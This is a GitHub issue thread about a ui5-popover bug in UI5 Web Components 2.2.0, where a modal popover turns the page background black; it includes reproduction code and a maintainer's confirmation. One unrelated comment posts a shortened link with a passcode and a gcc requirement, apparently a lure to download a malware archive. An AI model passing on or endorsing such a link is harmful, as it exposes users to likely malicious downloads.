### ISSUE TITLE
[ui5-popover]: Popover with modal attribute turns background black

### ISSUE THREAD

**Issue by floa93** [SAP/ui5-webcomponents#9823]
### Bug Description

In Version 2.2.0 when using the popover with modal="true" the background turns black. In 2.1.2 and in 1.x this was not the case , there the background was just greyed out, which is nice because the context of the page is still visible to the customer.

### Affected Component

ui5-popover

### Expected Behaviour

Turning the background completely black seems confusing to the user if the context of the page cannot be seen anymore.

### Isolated Example

https://sap.github.io/ui5-webcomponents/nightly/play/#eyJpbmRleC5odG1sIjp7Im5hbWUiOiJpbmRleC5odG1sIiwiY29udGVudCI6IjwhLS0gcGxheWdyb3VuZC1mb2xkIC0tPlxuPCFET0NUWVBFIGh0bWw-XG48aHRtbCBsYW5nPVwiZW5cIj5cblxuXG5cbjxoZWFkPlxuICAgIFxuICAgIDxzdHlsZT5cbiAgICAgICo6bm90KDpkZWZpbmVkKSB7XG4gICAgICAgIGRpc3BsYXk6IG5vbmU7XG4gICAgICB9XG4gICAgPC9zdHlsZT5cblxuICAgIFxuICAgIDxzdHlsZT5cbiAgICAgICo6bm90KDpkZWZpbmVkKSB7XG4gICAgICAgIGRpc3BsYXk6IG5vbmU7XG4gICAgICB9XG4gICAgPC9zdHlsZT5cblxuICAgIDxtZXRhIGNoYXJzZXQ9XCJVVEYtOFwiPlxuICAgIDxtZXRhIG5hbWU9XCJ2aWV3cG9ydFwiIGNvbnRlbnQ9XCJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wXCI-XG4gICAgPHRpdGxlPlNhbXBsZTwvdGl0bGU-XG48L2hlYWQ-XG5cbjxib2R5IHN0eWxlPVwiYmFja2dyb3VuZC1jb2xvcjogdmFyKC0tc2FwQmFja2dyb3VuZENvbG9yKVwiPlxuICAgIDxzdHlsZT5cbiAgICAgICAgYm9keSB7XG4gICAgICAgICAgICBoZWlnaHQ6IDQyMHB4O1xuICAgICAgICB9XG5cbiAgICAgICAgLnBvcG92ZXItY29udGVudCB7XG4gICAgICAgICAgICBkaXNwbGF5OiBmbGV4O1xuICAgICAgICAgICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjtcbiAgICAgICAgICAgIGp1c3RpZnktY29udGVudDogY2VudGVyO1xuICAgICAgICB9XG5cbiAgICAgICAgLnBvcG92ZXItZm9vdGVyIHtcbiAgICAgICAgICAgIGRpc3BsYXk6IGZsZXg7XG4gICAgICAgICAgICBqdXN0aWZ5LWNvbnRlbnQ6IGZsZXgtZW5kO1xuICAgICAgICAgICAgd2lkdGg6IDEwMCU7XG4gICAgICAgICAgICBhbGlnbi1pdGVtczogY2VudGVyO1xuICAgICAgICAgICAgcGFkZGluZzogMC41cmVtIDA7XG4gICAgICAgIH1cblxuICAgICAgICAuY2VudGVyIHtcbiAgICAgICAgICAgIGRpc3BsYXk6IGZsZXg7XG4gICAgICAgICAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjtcbiAgICAgICAgICAgIGFsaWduLWl0ZW1zOiBjZW50ZXI7XG4gICAgICAgICAgICBoZWlnaHQ6IDEwMCU7XG4gICAgICAgICAgICB3aWR0aDogMTAwJTtcbiAgICAgICAgfVxuICAgIDwvc3R5bGU-XG5cbiAgPCEtLSBwbGF5Z3JvdW5kLWZvbGQtZW5kIC0tPlxuXG5cbiAgICA8ZGl2IGNsYXNzPVwiY2VudGVyXCI-XG4gICAgICAgIDx1aTUtYnV0dG9uIGlkPVwiYnRuMVwiPk9wZW4gUG9wb3ZlciB0byBCb3R0b208L3VpNS1idXR0b24-XG4gICAgPC9kaXY-XG4gICBcbiAgICA8dWk1LXBvcG92ZXIgaWQ9XCJwb3BvdmVyMVwiIG9wZW5lcj1cImJ0bjFcIiBtb2RhbD1cInRydWVcIiBoZWFkZXItdGV4dD1cIk5ld3NsZXR0ZXIgc3Vic2NyaXB0aW9uXCIgcGxhY2VtZW50PVwiQm90dG9tXCI-XG4gICAgICAgIDxkaXYgY2xhc3M9XCJwb3BvdmVyLWNvbnRlbnRcIj5cbiAgICAgICAgICAgIDx1aTUtbGFiZWwgZm9yPVwiZW1haWxJbnB1dFwiIHJlcXVpcmVkIHNob3ctY29sb24-RW1haWw8L3VpNS1sYWJlbD5cbiAgICAgICAgICAgIDx1aTUtaW5wdXQgaWQ9XCJlbWFpbElucHV0XCIgc3R5bGU9XCJtaW4td2lkdGg6IDE1MHB4O1wiIHBsYWNlaG9sZGVyPVwiRW50ZXIgRW1haWxcIj48L3VpNS1pbnB1dD5cbiAgICAgICAgICAgIDx1aTUtbGFiZWw-Tm90ZTogSWYgeW91IG9wZW4gdGhlIHBhZ2UgaW4gbW9iaWxlLCBhIGRpYWxvZyB3b3VsZCBiZSBkaXNwbGF5ZWQuPC91aTUtbGFiZWw-XG4gICAgICAgIDwvZGl2PlxuXG4gICAgICAgIDxkaXYgc2xvdD1cImZvb3RlclwiIGNsYXNzPVwicG9wb3Zlci1mb290ZXJcIj5cbiAgICAgICAgICAgIDx1aTUtYnV0dG9uIGlkPVwiY2xvc2VQb3BvdmVyQnV0dG9uXCIgZGVzaWduPVwiRW1waGFzaXplZFwiPlN1YnNjcmliZTwvdWk1LWJ1dHRvbj5cbiAgICAgICAgPC9kaXY-XG4gICAgPC91aTUtcG9wb3Zlcj5cbiAgICA8IS0tIHBsYXlncm91bmQtZm9sZCAtLT5cbiAgICA8c2NyaXB0IHR5cGU9XCJtb2R1bGVcIiBzcmM9XCJtYWluLmpzXCI-PC9zY3JpcHQ-XG48L2JvZHk-XG5cbjwvaHRtbD5cbjwhLS0gcGxheWdyb3VuZC1mb2xkLWVuZCAtLT5cbiJ9LCJtYWluLmpzIjp7Im5hbWUiOiJtYWluLmpzIiwiY29udGVudCI6Ii8qIHBsYXlncm91bmQtaGlkZSAqL1xuaW1wb3J0IFwiLi9wbGF5Z3JvdW5kLXN1cHBvcnQuanNcIjtcbi8qIHBsYXlncm91bmQtaGlkZS1lbmQgKi9cbmltcG9ydCBcIkB1aTUvd2ViY29tcG9uZW50cy9kaXN0L1BvcG92ZXIuanNcIjtcbmltcG9ydCBcIkB1aTUvd2ViY29tcG9uZW50cy9kaXN0L0J1dHRvbi5qc1wiO1xuaW1wb3J0IFwiQHVpNS93ZWJjb21wb25lbnRzL2Rpc3QvTGFiZWwuanNcIjtcbmltcG9ydCBcIkB1aTUvd2ViY29tcG9uZW50cy9kaXN0L0lucHV0LmpzXCI7XG5cbmNvbnN0IGJ0bjEgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChcImJ0bjFcIik7XG5jb25zdCBwb3BvdmVyMSA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKFwicG9wb3ZlcjFcIik7XG5jb25zdCBidG4yID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoXCJidG4yXCIpO1xuY29uc3QgcG9wb3ZlcjIgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChcInBvcG92ZXIyXCIpO1xuXG5idG4xLmFkZEV2ZW50TGlzdGVuZXIoXCJjbGlja1wiLCAoKSA9PiB7XG5cdHBvcG92ZXIxLm9wZW4gPSAhcG9wb3ZlcjEub3Blbjtcbn0pO1xuYnRuMi5hZGRFdmVudExpc3RlbmVyKFwiY2xpY2tcIiwgKCkgPT4ge1xuXHRwb3BvdmVyMi5vcGVuID0gIXBvcG92ZXIyLm9wZW47XG59KTsifX0

### Steps to Reproduce

1. Use a ui5-popover with modal="true"

```
   <div class="center">
        <ui5-button id="btn1">Open Popover to Bottom</ui5-button>
    </div>
   
    <ui5-popover id="popover1" opener="btn1" modal="true" header-text="Newsletter subscription" placement="Bottom">
        <div class="popover-content">
            <ui5-label for="emailInput" required show-colon>Email</ui5-label>
            <ui5-input id="emailInput" style="min-width: 150px;" placeholder="Enter Email"></ui5-input>
            <ui5-label>Note: If you open the page in mobile, a dialog would be displayed.</ui5-label>
        </div>

        <div slot="footer" class="popover-footer">
            <ui5-button id="closePopoverButton" design="Emphasized">Subscribe</ui5-button>
        </div>
    </ui5-popover>
```

JS:

```
import "@ui5/webcomponents/dist/Popover.js";
import "@ui5/webcomponents/dist/Button.js";

const btn1 = document.getElementById("btn1");
const popover1 = document.getElementById("popover1");

btn1.addEventListener("click", () => {
	popover1.open = !popover1.open;
});
```

### Priority

None

### UI5 Web Components Version

2.2.0

### Browser

Chrome

### Operating System

Windows

### Organization

SAP

### Declaration

- [X] I’m not disclosing any internal or sensitive information.

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by kskondov** [comment]
Hello @SAP/ui5-webcomponents-topic-rd , 

There is an issue with modal popover where the block layer turns black when you open modal popover in the playground:\
Open the [Basic Sample](https://sap.github.io/ui5-webcomponents/components/Popover/) add the ```modal``` attribute  to the ui5-popover, the block layer turns black which makes the context page not visible.

Best Regards,
Konstantin
